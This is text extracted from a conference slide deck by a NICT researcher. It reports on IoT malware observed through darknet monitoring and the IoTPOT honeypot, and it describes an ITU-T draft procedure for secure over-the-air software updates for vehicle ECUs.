Security issues related to Vehiclesand Secure OTA Software UpdatesMasashi EtoResearch Manager,Cybersecurity Human Resource Development Research Center,NICT, Japan1

Outline Observing current IoT Attacks– Darknet basis attack observation Understanding Infected IoT devices– IoT Honeypot and Sandbox Secure OTA Updates for ITS/IoTsoftware/firmware– As one of the countermeasures against threats inITS/IoT environments -2

Observing current IoT Attacks3

Scanning observation by darknet monitoring Darknet:– unused IP address range which is efficient forcyber-attack observation Capturing packetsthrough darknet inreal time basis.Atlas Allview Color indicates theprotocol types. UDP TCP SYN TCP SYN/ACK TCP Other ICMPAtlasonlyport234

23/tcp Scan from Embedded Device23/tcpOct. 2013 – Dec 2014 Infected Devices Home Router Web Camera NAS: Network Attached Storageetc. etc.5

The attacking hosts are IoT devices150,000 attacking IPs361 modelsobserved in 4 months

Why IoT devices? 24/7 online No AV Weak/Default login passwords with global IP address and open to Internet

Understanding Infected IoT devices8

We would like to know.Malware What kind ofmalware? How many differentkinds?Targets What IoT devices aretargeted?Monetization What theattackers doaftercompromisingthese devices?We have developed the first honeypot for IoT

ChallengesHoneypotIoT devices listening on TelnetSandbox: IoTBOXIoT malware of different CPUArchitectureARMMIPSELSUPERHPPCX86MIPS Emulating diverse IoT devicesHandling to capture malware ofdifferent CPU architectures Handle to run malware ofdifferent CPU architectures

Emulating different actionsDevice ProfileBanner InteractionDo Echo, Do NAWS, Will Echo* NAWS (Negotiate About Window Size)WelcomeADSL Routermessage& Login prompt cationroot12345ARMDifferentUserID/Passcat /bin/shResponse 2MIPSCommand Interactioncat s Different Banner Interactions Scanning Internet on port 23 to get different banners Different User ID/Pass Obtain weak/default ID/Pass by web search Different Interactions/Responses Learn from actual devices System with general configuration for embedded devices (e.g. OpenWRT )

IoTPOT results During 122 days of operations [ April 01 to July 31 - 2015]250,000Unique Host d Malware 90,394 Malware Download Attempts Malware of 11 different CPU architectures 93% of downloaded binaries are new to VirusTotal (2015/09)

General flow of telnet based attacksMalware DL serverMalware (binary)Malware (shell)Attacker3. Downloador alreadyMalwareinfectedIoT2. Series ofTelnetCommands1.Login attemptsusing dictionaryattackC&CServer4. Attack commandScan 23/TCPDoS

Attack Example1: DNS Water Torture attacksNo r at” devices

Attack Example-2: Click fraudInfected devices imitates user clicksto advertising web sitesInfected Devices

Attack Example-3: Stealing credential from PPVParticular set top boxes arebeing targeted (such asdreambox)credential

Looking back on devices visiting IoTPOTNumber of IP Addresses12000 107341000080006000More than 60 different types (361 models)of devices visit IoTPOT We scan back on port 23/TCP and 80/TCP More than 60 type of devices visit us48564000200001391787 430 411 337206 206 174 60Device Types201915111010966

Web interfaces of devices attacking us

Categorizing IoT device types infected by MalwaresCategorySurveillanceGroupDeviceIP ureIndustrialControlSystemGatewayModemDeviceSolid State RecorderInternet Communication ModuleData Acquisition ServerBACnet I/O ModulePersonalWeb CameraBridgePersonal Video RecorderSecurity ApplianceHome Automation GatewayVoIP GatewayTelephoneSystemCategoryIP PhoneBroadcastingFacilityDigital Video BroadcasterDigital Video ScalerGSM RouterVideo Encoder/DecoderAnalog Phone AdapterSettop BoxParking Management SystemLED display control systemOtherHeat PumpFire Alarm SystemDisk Recording SystemOptical Imaging FacilityFingerprint Scanner

AS with more than 1,000 infected IoT Devices

Key findings through our challenges– Malware At least 6 DDoS malware families target IoT devices via Telnet Malware samples of 11 different CPU architectures are captured 93 % of samples are new to Virus Total One family has quickly evolved to target more devices with as manyas 9 different CPU architectures– Targets More than 60 types (361 models) of IoT devices are infected– Monetization 11 types of DDoS attacks Scans (TCP/23,80,8080,5916 and UDP/ 123,3143) Fake web hosting Click fraud attacks Stealing credential of PPV and so on

Secure OTA Updates for ITS/IoT software/firmware- One of the countermeasures against threats in ITS/IoT environments -22

Development of an ITU-T Recommendation ITU-T: International Telecommunication Union, Telecomsector– SG17: Responsible for security standards Title of Recommendation– “Secure software update capability for ITS communicationsdevices” (X.itssec-1) Purpose– to provide common methods to update the software by a secureprocedure including security controls and protocol definition– The adoption of the Recommendation is not mandatory forautomotive industries, but the Recommendation would be aguideline of the baseline security for networked vehicle. Editors– Masashi Eto (NICT)– Koji Nakao (KDDI/NICT)23

Secure OTA Updates for ITS/IoT software/firmware General model of networked vehicleSupplierCar Manufacturer /Garage centerCommunicationPath.Focused AreaCommunicationPathUpdateServer /log databaseVehicle MobileGateway(Head Unit)Aftermarket InformationDeviceOn-board Information DevicePower Management ControlECUSeat Belt Control ECUDriving Support ECUParking Assist ECUSkid Control ECUetc.,This procedure is under development for ITU-TRecommendation (will be fixed in September, 2016)

An example of ITS software remote update procedureRequest of diagnose of software statusResult of diagnose with software statusReport of results of ECUs in a vehicleReceipt for submit of diagnose reportRequest of update moduleUpdate module is providedNotification to User (driver) for UpdatesConfirmation for the updateRequest for updates to ECUsResults for updates in ECUsReport of application of the updateConformation from the Update server25

Conclusion Security Key Controls for ITS/IoT environments observation/analysis and Vulnerability detectionMalware/intrusion detectionRemote curing method for vulnerable IoT devicesRemote OTA Software Update (ITU-T)Data Confidentiality– Light-weight crypto6. Appropriate Authentication and Access control7. Incident handling and Information (threat) sharingIoT devicesEnvironmentsThe NetworkedCarenvironments26

Thank you for your attention!27